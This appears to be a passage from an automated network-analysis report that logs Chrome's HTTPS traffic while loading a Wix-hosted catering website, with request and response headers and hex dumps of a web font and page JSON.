                                                                                                                                                                                                                        x-seen-by: AHc3TXLcXOul+t9LIbGg9ciHE4dbw+wewoJ5nvKoyjE=,m0j2EEknGIVUW/liY8BLLvV5qreXzz/ebhjSfXjgqP2WWveFEnegpnkLxzZh8fhS,rXUceJIlvIg2Ftogbhjv0L5hQ+m/FZCWRvjudhBpucVEQfi00LSS7LJu7sdkoLsDxoeG309UkCf04PJvOMe9jA==,r6yY0ta7bIKrqK70x072le7w24FVk6wRPZfDsMKqIyc=,bOnBQDOCjWxRPsoIciwTIUSdxV4dlpNeascEzTB59iF7GpfSheMv0/0owJo5qPK8WDOXRj+ap1EiMZLwvJC21g==
                                                                                                                                                                                                                        server: Pepyaka
                                                                                                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                                                                                        referrer-policy: no-referrer-when-downgrade
                                                                                                                                                                                                                        via: 1.1 google
                                                                                                                                                                                                                        glb-x-seen-by: wMMTADooq5AJ3cFomJ/MuXOQWGce7NCZXKms1ErOpBs=
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        7192.168.2.5497233.234.186.1414435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:52:36 UTC1051OUTPOST /bolt-performance?src=72&evid=21&appName=thunderbolt&is_rollout=1&is_company_network=false&is_sav_rollout=0&is_dac_rollout=0&dc=virginia-pub&microPop=fastly_virginia-pub_g&is_cached=true&msid=8fc1138c-79b4-4e29-bbc0-d551c6ca71af&session_id=609f0441-2d8c-4646-846e-278b54a8f519&ish=false&isb=false&vsi=4d6f889a-d75d-4216-a25e-a2eb4ad3a234&caching=hit,hit_miss&pv=visible&pn=1&v=1.15031.0&url=https%3A%2F%2Fwww.samantacatering.com%2F&st=2&ts=571&tsn=2113&platformOnSite=false HTTP/1.1
                                                                                                                                                                                                                        Host: frog.wix.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Origin: https://www.samantacatering.com
                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                        Referer: https://www.samantacatering.com/
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:52:36 UTC388INHTTP/1.1 204 No Content
                                                                                                                                                                                                                        Date: Fri, 10 Jan 2025 13:52:36 GMT
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                        Access-Control-Allow-Origin: https://www.samantacatering.com
                                                                                                                                                                                                                        Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, POST
                                                                                                                                                                                                                        Access-Control-Allow-Headers: Accept,Authorization,Cache-Control,Content-Type,DNT,If-Modified-Since,Keep-Alive,Origin,User-Agent,X-Requested-With


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        8192.168.2.54972534.49.229.814435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:52:36 UTC680OUTGET /tag-bundler/api/v1/fonts-cache/googlefont/woff2/s/playfairdisplay/v18/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgEM86xQ.woff2 HTTP/1.1
                                                                                                                                                                                                                        Host: static.parastorage.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                        Origin: https://www.samantacatering.com
                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: font
                                                                                                                                                                                                                        Referer: https://www.samantacatering.com/
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:52:36 UTC945INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Content-Length: 16972
                                                                                                                                                                                                                        X-Envoy-Upstream-Service-Time: 21
                                                                                                                                                                                                                        Server: Pepyaka/1.21.6
                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                                                                        Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-*
                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                        X-Varnish: 11352766 176130768
                                                                                                                                                                                                                        Via: 1.1 varnish (Varnish/6.0),1.1 varnish (Varnish/6.0), 1.1 google
                                                                                                                                                                                                                        X-Cluster-Self-Is-Next: false
                                                                                                                                                                                                                        X-Varnish: 17370402 13749845
                                                                                                                                                                                                                        X-Cache-Status: HIT
                                                                                                                                                                                                                        X-Seen-By: aVxMblM8KFG3we5NLvyVc75LqHKURxvujjeddHLBCHZn+PxHDBkh4V2x50EyEnEQ
                                                                                                                                                                                                                        X-Cluster-Node-Role: serve
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Date: Thu, 19 Dec 2024 17:05:40 GMT
                                                                                                                                                                                                                        Cache-Control: public, max-age=7776000
                                                                                                                                                                                                                        Age: 1889216
                                                                                                                                                                                                                        Content-Type: font/woff2
                                                                                                                                                                                                                        x-cache: hit
                                                                                                                                                                                                                        glb-x-seen-by: qhk2IXhXaFW+ScoHjRxEUvX1Zxk6j9wOS6tQMkUbOP0=
                                                                                                                                                                                                                        x-gcp-cdn-pop: LGA-991dec68
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        2025-01-10 13:52:36 UTC445INData Raw: 77 4f 46 32 00 01 00 00 00 00 42 4c 00 0e 00 00 00 00 a4 94 00 00 41 f1 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 34 1b c6 70 1c 8b 4c 06 60 00 84 7c 11 08 0a 81 ce 38 81 a4 73 0b 84 56 00 01 36 02 24 03 89 18 04 20 05 85 50 07 8b 5d 1b 85 8c 15 d3 6d c6 03 e7 01 04 b4 bf e7 e6 51 e4 71 20 f8 d4 7f 44 52 4e 1a 76 f0 ff c7 04 b9 86 08 f1 f6 41 2c b6 d3 d8 a9 48 3b 08 53 05 2e a2 6b 53 7d 9e e9 c3 19 6e 74 f7 ee 39 6f b7 f8 e2 f9 0a 84 6f ec 98 e4 85 ad 58 d9 8a 23 e9 85 fb 1d e7 1e a7 49 c3 41 34 46 14 92 1f f0 cf be f9 cd 2c fc 59 45 11 a8 9d 58 bf 13 c0 6b f5 04 72 90 dd 56 46 39 c8 6c 67 1c dd b1 08 8c 5b ec a8 33 f3 fe 3c bf cd 3f f7 be 24 d2 06 84 47 8a 85 58 b1 c6 55 38 6b 65 c5 4a 7b 1d e1 fa fb fd da fb e5 ba ad b5
                                                                                                                                                                                                                        Data Ascii: wOF2BLA4pL`|8sV6$ P]mQq DRNvA,H;S.kS}nt9ooX#IA4F,YEXkrVF9lg[3<?$GXU8keJ{
                                                                                                                                                                                                                        2025-01-10 13:52:36 UTC1390INData Raw: 48 c4 67 12 d6 a5 eb 5a f5 f6 46 f7 60 f1 ee 46 c7 19 22 66 2d 71 26 ca 7b 61 c5 e7 3d e0 f9 f7 6f 77 77 8f fe 3e 08 05 69 a0 07 84 da 82 12 ed af b9 37 6f aa f4 19 43 a4 64 09 29 f9 44 4b fc 36 d4 b9 c3 da fc 4f ae 99 2b b0 4b 69 1d b1 8a c8 33 cf ee 9e 2f 75 01 2a 8e e9 fb 42 11 8b f8 5f b6 d2 74 bf 9e be 80 7f 8d c8 e6 35 8f 79 82 4c 52 90 68 4a 99 93 e8 d2 be 99 3e e8 7d db 02 ee 5b 13 8d 81 70 f7 0c 84 49 6a ad 19 73 73 12 ba 72 a7 5c b9 43 05 51 e2 9f b7 a9 d5 ce 48 b2 2d 85 b5 bb 87 55 bc 08 45 77 4c e5 55 c0 45 f3 f5 ff 1b 69 fe 7c 8d c4 89 66 e4 68 c7 56 c8 92 63 92 1d d3 82 46 d6 44 64 50 58 41 ae b2 d5 1d 1b 42 70 00 80 1d 60 49 45 b7 4d 75 4d 4b 50 57 d7 76 d7 9e 2e 09 d7 80 16 77 d7 d7 21 1f 31 e2 76 fb f2 6b ec e1 1e 2d cc ec 20 22 21 04 91
                                                                                                                                                                                                                        Data Ascii: HgZF`F"f-q&{a=oww>i7oCd)DK6O+Ki3/u*B_t5yLRhJ>}[pIjssr\CQH-UEwLUEi|fhVcFDdPXABp`IEMuMKPWv.w!1vk- "!
                                                                                                                                                                                                                        2025-01-10 13:52:36 UTC1390INData Raw: 70 38 b1 6a 0b 17 9e 3d 3c 9d 2d d4 b8 22 61 82 91 a1 6c 78 1a b2 2d 19 e6 d8 f7 2b 05 3e d9 09 c6 bf 96 ea 07 c5 6e ca 63 67 de da d0 e7 93 24 30 1d e2 62 ec e5 2d 9b 3f 0b 1c aa 25 b0 1c 51 a4 89 b0 93 3f 99 01 94 14 11 6a 24 14 45 a4 00 08 8e ae 30 7f c8 f6 c8 35 e7 7a e1 e7 b4 b4 51 d8 54 9d fc 33 4c 5f 4e 6a db f1 c4 d4 99 21 5e b5 4a ba 77 02 af 29 5d b2 31 2d 86 2a ca a3 eb 3c f8 f6 e0 0e 65 4e 95 72 b1 6e 20 e3 a3 7b 4e 14 99 f5 77 72 33 b0 2e 1a 9d 68 d7 d0 7c 4a c0 60 19 04 4c ef 54 c6 ad 67 e4 43 e2 0a 78 8f 55 2d 1c 24 68 99 30 15 cb d2 c5 32 9c c7 77 11 27 88 9d 64 55 a1 ab d3 7a e1 2a 9f fd 1d 29 86 fa 51 73 2c 8c 02 7e e4 66 70 2f 4f 4c 4d a3 6a f8 56 ee d4 76 c4 ef af 3f 50 99 04 54 2e 0f 47 46 7a 95 ca d9 26 91 63 65 a2 36 2e 97 cc e4 48
                                                                                                                                                                                                                        Data Ascii: p8j=<-"alx-+>ncg$0b-?%Q?j$E05zQT3L_Nj!^Jw)]1-*<eNrn {Nwr3.h|J`LTgCxU-$h02w'dUz*)Qs,~fp/OLMjVv?PT.GFz&ce6.H
                                                                                                                                                                                                                        2025-01-10 13:52:36 UTC1390INData Raw: f3 ef fc 2c 49 1f 45 b1 27 51 3d 1d 09 8c 70 3b 08 c2 05 45 ea 02 06 e2 c4 aa 4e 26 54 6b 3c f5 e4 d3 93 d0 15 90 a0 40 82 22 5a 28 81 81 3a b8 82 b1 0f 8f 89 82 f6 13 97 e2 ed da 7c 02 2e 6b 10 dc 72 86 e2 c7 06 28 ba f9 75 02 49 09 db 78 c8 93 30 11 82 42 98 ce 09 d6 09 e0 58 db d6 13 1d b8 c2 11 15 dc 00 38 40 79 8b e8 4f 02 90 73 a4 e4 4c 4e 45 01 42 67 2c 66 ca 9d 2b cf 6d 87 2d d8 27 ae 02 f4 36 14 81 ed 3d f5 b2 dc 6e 88 a7 72 77 6f a4 a5 6f 3d 0c 42 04 21 8c 78 80 3f fd 4e 22 e6 e3 16 02 8b 05 22 36 51 32 e6 47 da de 40 81 20 69 66 a4 6c 8c 94 45 81 72 92 61 86 6b 03 78 b1 40 f8 0e b9 69 20 3a 69 ff 3e 7f d1 9c 50 8d 08 70 0d f0 b9 fd d9 8c 37 5f 6f bb b5 8d 92 36 50 d2 16 09 86 ac 39 76 79 3f bb 39 6e 30 be 3a 5b 27 fd cf ce e7 48 cd 2a 08 bb e5
                                                                                                                                                                                                                        Data Ascii: ,IE'Q=p;EN&Tk<@"Z(:|.kr(uIx0BX8@yOsLNEBg,f+m-'6=nrwoo=B!x?N""6Q2G@ iflErakx@i :i>Pp7_o6P9vy?9n0:['H*
                                                                                                                                                                                                                        2025-01-10 13:52:36 UTC1390INData Raw: cc aa 1a 52 20 aa 47 f5 00 49 37 47 ae 4c 20 d6 ab da e7 f8 ae ed f1 b0 d5 23 67 4c be f1 a7 f6 8b ef 63 58 6c 5f b3 c0 81 53 5b 38 6d 3c 47 6c 34 e0 d2 c1 4a 83 49 e3 99 82 f5 df 9e 41 33 f1 da 81 98 29 9d 4a a1 1b 02 8b 00 10 be dc dd cb bf dc 08 d1 90 fa 9c e0 43 96 d3 cc 5a 8b 8c 87 f7 34 25 68 83 6b 0f 2c 68 43 ee dc 48 b6 cb 08 f0 93 e3 a6 d4 6d 04 dd 34 68 38 db e4 df cf e6 82 f3 18 e7 59 3d 5a 1d 40 9e 32 9b 06 86 c1 12 c5 8e 6c 25 d2 3c c9 0e 9b d5 20 a0 90 57 44 f4 6f df 1f e3 a8 46 f8 18 ec 8b 60 d6 16 c6 72 3f 12 ab 71 67 47 b5 c3 39 63 2d 59 1d 8e 45 da 5a be 35 85 fc d5 11 86 4e ae c0 bd 9a cc d7 ad ee c4 60 42 bb 9c 80 33 40 89 7c 06 c4 07 0b b1 62 e7 29 4e 30 7f d9 47 21 e2 f9 4c 21 39 14 45 c3 9a 48 13 8c 94 83 57 20 22 21 0d 92 42 07 30
                                                                                                                                                                                                                        Data Ascii: R GI7GL #gLcXl_S[8m<Gl4JIA3)JCZ4%hk,hCHm4h8Y=Z@2l%< WDoF`r?qgG9c-YEZ5N`B3@|b)N0G!L!9EHW "!B0
                                                                                                                                                                                                                        2025-01-10 13:52:36 UTC1390INData Raw: 87 b6 89 d9 56 31 e4 b8 a6 b6 86 3a 9a 5a f6 ed 25 32 d8 cb 24 ac 0d 52 9c 88 94 42 5f 60 8e 87 bd a5 a7 30 5d 00 e7 26 37 2a c9 24 2b 27 cf af b5 63 37 5c 48 0f b4 47 70 6c 47 88 40 c9 1c 42 7c f5 a8 ca 7a fe 19 09 8f f8 e2 31 ce 79 e4 31 53 68 94 cb 95 ed 82 4b 98 c2 37 72 06 bf 87 2e 9d 67 5f 95 92 00 67 67 b9 df 9d 7c 09 56 de be ab 41 63 bd 71 f1 ae 07 8d 12 21 65 40 e9 31 93 d8 49 09 46 31 eb dd 2c 86 62 34 ab 41 98 e8 92 5c 70 b5 ec 20 da 4e 5f b9 a4 eb a7 47 ba 76 40 98 45 b1 76 c2 81 a7 ec e7 34 fd 89 6a 59 1f e3 19 8e 03 f9 48 b9 56 4c 38 90 62 e5 44 a3 cb f3 7c b4 34 9c 81 13 2e 65 3f a0 58 4a ff 12 ee 2e 1c a3 10 24 d2 f2 4b 1a 7f ed d0 f1 5c da 4a 6f 02 b2 03 31 70 65 71 70 e1 8d 15 f3 b1 02 12 36 0a ef 22 9e 82 d1 4d 12 58 98 e2 37 23 73 5f
                                                                                                                                                                                                                        Data Ascii: V1:Z%2$RB_`0]&7*$+'c7\HGplG@B|z1y1ShK7r.g_gg|VAcq!e@1IF1,b4A\p N_Gv@Ev4jYHVL8bD|4.e?XJ.$K\Jo1peqp6"MX7#s_
                                                                                                                                                                                                                        2025-01-10 13:52:36 UTC1390INData Raw: 8e 06 b8 86 9c e3 8b 14 0a ae 1c 85 af cc 70 40 dd 08 9f d1 b8 63 a7 c3 2e 88 ba 82 c3 c5 ce f2 21 d4 5b a7 c1 20 49 a2 01 42 9b 5a cc e0 6a 7b a7 69 36 32 94 1b 58 e5 a3 7c 83 20 f6 8b 0e 11 f6 79 c2 35 ec 88 cf f8 ab a4 57 42 1b 2c 4a 2e 9d f1 ee 06 7a a1 b3 77 83 f0 cf 03 08 95 ea 2f c1 f0 f5 ef e4 80 34 e9 b7 7e 86 2e 9c 81 30 9d 40 6d 70 ed 28 75 15 d7 18 2b e6 41 8f 73 74 f2 04 b3 23 a5 9a 98 d2 33 4f 4c 46 52 3b 40 21 33 0a 19 af c2 f0 ef 27 86 34 d7 c1 91 06 cd 84 08 19 dc ee 6d 3a b5 9f 5e 48 81 81 c9 8b c7 7f d8 df 82 c6 ad a1 c1 83 59 3c c9 fb be ed 6b 8b 17 91 5b 5f 2c ec 0c b3 c4 67 6b ac 9a ac bf 54 88 88 92 67 65 d6 a4 d0 4b 72 f2 50 06 62 cc a4 ee cc 9e 90 d0 7c 17 aa 29 54 06 d0 f8 27 9f 10 c0 8b 27 66 37 dd 31 f9 6c 2e 65 5f a4 c4 66 6a
                                                                                                                                                                                                                        Data Ascii: p@c.![ IBZj{i62X| y5WB,J.zw/4~.0@mp(u+Ast#3OLFR;@!3'4m:^HY<k[_,gkTgeKrPb|)T''f71l.e_fj
                                                                                                                                                                                                                        2025-01-10 13:52:36 UTC1390INData Raw: ec e5 3c 0b 24 61 f5 ed 53 51 20 5f 16 fa bb 2c 76 47 b4 66 88 5f 20 9a 56 10 31 27 ce c1 99 cd b4 96 0c 09 aa 13 39 9f 11 67 1a e5 66 e4 21 4f 7b e9 bb 2c 33 89 73 30 3f 94 02 ab 54 02 2e 52 8e 7a 2f 84 fc a8 93 a7 36 96 e4 88 6a 3a 0d 95 b4 81 c7 c7 38 d7 50 65 9f 10 ac 74 96 86 c0 c5 05 54 ab ff d8 09 4a 23 dc cd 92 ec e2 5c 85 a8 b6 53 5f 99 35 e0 e9 57 56 d9 9b ca ca 5c a1 20 78 49 86 1d 73 13 8a 84 c5 a9 7a 8a 2d fd bf 29 07 b8 42 08 96 33 ba 9e 0f 0e 7f 5d 18 d3 17 32 ae 6b 50 fd 67 fc 04 cb 96 99 15 fe 98 88 0e fe 49 cd 94 56 78 2d 49 6a f1 71 5b 7c 18 23 40 d7 47 1e 0c f9 57 5e 67 f3 0a 4e c2 d5 23 96 01 76 f9 df 80 5d 72 be ce 75 f6 55 b8 38 4c 77 91 da 84 3e ac 43 7f 72 83 58 bb de 9f 8c ab fc 63 66 c7 83 11 e6 53 43 b5 ad d8 ed 73 f9 83 20 e3
                                                                                                                                                                                                                        Data Ascii: <$aSQ _,vGf_ V1'9gf!O{,3s0?T.Rz/6j:8PetTJ#\S_5WV\ xIsz-)B3]2kPgIVx-Ijq[|#@GW^gN#v]ruU8Lw>CrXcfSCs
                                                                                                                                                                                                                        2025-01-10 13:52:36 UTC1390INData Raw: 57 27 1d 7a a4 79 75 23 a6 de 99 33 4d 3d 4a 25 39 a8 57 af 12 1c 6c 30 9a 17 13 8e e1 5f 64 aa 73 59 1a 0c a6 c5 e4 6d 03 cd e6 ba 4c 9a d6 d4 33 9c 71 c6 49 b5 18 f2 9f 1a 51 e9 49 38 ed a6 1a f5 40 3c a3 3b 3a ec d6 6b 4a f3 57 bc 57 9c 9b 5b d9 35 77 c1 02 d9 bb 52 11 cc 5b b8 3a a4 ca 4f 04 9e 2c 97 3f 43 60 10 4c 3e cb 7e cd 06 dd 28 cf 34 bd 33 66 6a 7a c6 91 f4 cd 9c 51 7a 8a 72 c1 32 69 a1 22 6b a2 db 25 9a 5b e7 77 b1 af c7 cc e0 bd 15 c1 15 65 28 32 51 e6 d8 8f 8c e7 1a ff bc d2 e8 f7 e7 ca 83 31 a8 db 9d 02 8b f6 75 e6 35 1f 1b f4 b2 f0 bc d0 4b 89 a6 b3 7a 6b ce 8f 2a fc c9 49 24 97 a1 2a 60 d1 5b de 3e b5 55 92 95 5f 96 9f dd 13 0a e6 f4 56 28 55 52 03 3d 60 b6 47 4f a0 c9 b6 b6 9f fc 36 9b 3a c6 53 6a a7 f6 77 9b bb 0d 60 2a 56 40 4b f9 33
                                                                                                                                                                                                                        Data Ascii: W'zyu#3M=J%9Wl0_dsYmL3qIQI8@<;:kJWW[5wR[:O,?C`L>~(43fjzQzr2i"k%[we(2Q1u5Kzk*I$*`[>U_V(UR=`GO6:Sjw`*V@K3
                                                                                                                                                                                                                        2025-01-10 13:52:36 UTC1390INData Raw: 1b 57 78 95 c7 37 64 36 c5 28 fa fa c1 f1 c0 a2 88 51 cf 68 14 6c fc 06 bb 3a 81 df 73 be 50 3e 62 49 fb 81 02 5c 3f e7 1b a7 34 c6 7f 71 42 c3 2a 0e 15 9a ec 15 9d ab 35 1e fc 17 8d 52 7d ad 55 a3 33 2b 89 48 f7 0a 3c 4f 4a 6f a7 7e 2d 4e 06 25 1f 78 a5 e2 2a 83 2d af a1 5a ae aa 68 5a 31 6f 71 e3 57 6b ea 5c 18 e9 68 85 c1 b6 24 6e 52 43 01 9b 8b 3f a8 a9 6d a8 cb 0f 8b 18 46 6e 42 12 63 99 a1 47 0c 96 bc bf c5 b4 b0 ed 59 cd b4 c5 05 50 2a 1c 87 0c c3 84 89 44 97 70 85 7e 5a 76 50 e8 7e 80 ed 37 63 75 6e cd b4 1b a0 a1 fe 42 a6 4b 92 9b 53 54 99 a5 0e 4c 2a f2 9a 8a 9b 2c 8c 2f 75 a1 7c 61 96 d9 cf 96 5a c2 16 9d 5c 17 fa 2e 24 b4 89 15 5a cf bf 57 6a 95 62 8b 50 7e cc 62 52 65 f1 ed db 9b 8a d4 53 2d 8a b0 0a 54 60 9b 16 f6 4f 6f 3c bc 76 bc 33 41 5a
                                                                                                                                                                                                                        Data Ascii: Wx7d6(Qhl:sP>bI\?4qB*5R}U3+H<OJo~-N%x*-ZhZ1oqWk\h$nRC?mFnBcGYP*Dp~ZvP~7cunBKSTL*,/u|aZ\.$ZWjbP~bReS-T`Oo<v3AZ


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        9192.168.2.54972634.49.229.814435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:52:36 UTC2651OUTGET /pages/pages/thunderbolt?beckyExperiments=.DatePickerPortal%2C.LoginBarEnableLoggingInStateInSSR%2C.TextInputAutoFillFix%2C.WRichTextVerticalTextNowidth%2C.WixFreeSiteBannerMobile%2C.buttonUdp%2C.fetchBlocksDevCenterWidgetIds%2C.fiveGridLineStudioSkins%2C.fixRatingsInputLeftShift%2C.imageEncodingAVIF%2C.inflateRepeaterItemsInRender%2C.minMaxInCheckboxGroup%2C.motionFeature%2C.prefetchPageResourcesVeloApi%2C.removeAllStatesBlocksFix%2C.removeHeaderFooterWrappers%2C.shouldUseResponsiveImages%2C.updateRichTextSemanticClassNamesOnCorvid%2C.useInternalBlocksRefType%2C.useSvgLoaderFeature&blocksBuilderManifestGeneratorVersion=1.129.0&contentType=application%2Fjson&deviceType=Desktop&dfCk=6&dfVersion=1.4246.0&disableStaticPagesUrlHierarchy=false&editorName=Unknown&experiments=dm_bgScrubToMotionFixer%2Cdm_deleteLayoutOverridesForRefComponents%2Cdm_removeTpaChildren%2Cspecs.thunderbolt.use_data_fixed_pages_upstream&externalBaseUrl=https%3A%2F%2Fwww.samantacatering.com&fileId=b5f4a1df.bundle.min&formFactor=desktop& [TRUNCATED]
                                                                                                                                                                                                                        Host: siteassets.parastorage.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                        Origin: https://www.samantacatering.com
                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                        Referer: https://www.samantacatering.com/
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:52:36 UTC1362INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Fri, 10 Jan 2025 13:52:36 GMT
                                                                                                                                                                                                                        Content-Type: application/json
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        ETag: W/"15ad-nNVlPZjYCOwlAiwDkMJ+oxT8Q4M"
                                                                                                                                                                                                                        X-Wix-Request-Id: 1736517156.9323735126032845670
                                                                                                                                                                                                                        Access-Control-Expose-Headers: age,via,x-cache-status,X-cache-status
                                                                                                                                                                                                                        X-Varnish: 583338928 548415790
                                                                                                                                                                                                                        Via: 1.1 varnish (Varnish/6.0),1.1 varnish (Varnish/6.0),1.1 varnish (Varnish/6.0),1.1 varnish (Varnish/6.0),1.1 varnish (Varnish/6.0), 1.1 google
                                                                                                                                                                                                                        X-Varnish: 860642492 757289614
                                                                                                                                                                                                                        X-Varnish: 859823769
                                                                                                                                                                                                                        Server: Pepyaka/1.21.6
                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                                                                        Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-*,DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-*,x-wix-client-artifact-id
                                                                                                                                                                                                                        X-Varnish: 1071764823
                                                                                                                                                                                                                        Content-Length: 5549
                                                                                                                                                                                                                        X-Cluster-Self-Is-Next: false
                                                                                                                                                                                                                        X-Varnish: 174476335
                                                                                                                                                                                                                        Age: 0
                                                                                                                                                                                                                        X-Cache-Status: HIT
                                                                                                                                                                                                                        X-Seen-By: aVxMblM8KFG3we5NLvyVcxMNgXS7J8yrt3GwAgEfDyVn+PxHDBkh4V2x50EyEnEQ
                                                                                                                                                                                                                        Cache-Control: max-age=2419200
                                                                                                                                                                                                                        X-Cluster-Node-Role: proxy
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        x-cache: miss
                                                                                                                                                                                                                        glb-x-seen-by: qhk2IXhXaFW+ScoHjRxEUvX1Zxk6j9wOS6tQMkUbOP0=
                                                                                                                                                                                                                        x-gcp-cdn-pop: LGA-991dec68
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        2025-01-10 13:52:36 UTC28INData Raw: 7b 22 73 74 61 74 65 52 65 66 73 22 3a 7b 22 63 6f 6d 70 2d 6d 34 73 39 6e 32 68 33
                                                                                                                                                                                                                        Data Ascii: {"stateRefs":{"comp-m4s9n2h3
                                                                                                                                                                                                                        2025-01-10 13:52:36 UTC780INData Raw: 22 3a 7b 22 65 78 70 65 72 69 6d 65 6e 74 73 22 3a 7b 22 24 74 79 70 65 22 3a 22 72 65 66 22 2c 22 72 65 66 50 61 74 68 22 3a 5b 22 65 78 70 6f 72 74 73 22 2c 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 2c 22 65 78 70 65 72 69 6d 65 6e 74 73 22 5d 7d 7d 2c 22 63 6f 6d 70 2d 6d 34 71 74 77 6a 31 6c 22 3a 7b 22 65 78 70 65 72 69 6d 65 6e 74 73 22 3a 7b 22 24 74 79 70 65 22 3a 22 72 65 66 22 2c 22 72 65 66 50 61 74 68 22 3a 5b 22 65 78 70 6f 72 74 73 22 2c 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 2c 22 65 78 70 65 72 69 6d 65 6e 74 73 22 5d 7d 7d 2c 22 63 6f 6d 70 2d 6d 34 71 74 78 73 66 67 22 3a 7b 22 72 65 70 6f 72 74 42 69 22 3a 7b 22 24 74 79 70 65 22 3a 22 72 65 66 22 2c 22 72 65 66 50 61 74 68 22 3a 5b 22 65 78 70 6f 72 74 73 22 2c 22 62 75 73 69 6e 65 73 73
                                                                                                                                                                                                                        Data Ascii: ":{"experiments":{"$type":"ref","refPath":["exports","environment","experiments"]}},"comp-m4qtwj1l":{"experiments":{"$type":"ref","refPath":["exports","environment","experiments"]}},"comp-m4qtxsfg":{"reportBi":{"$type":"ref","refPath":["exports","business
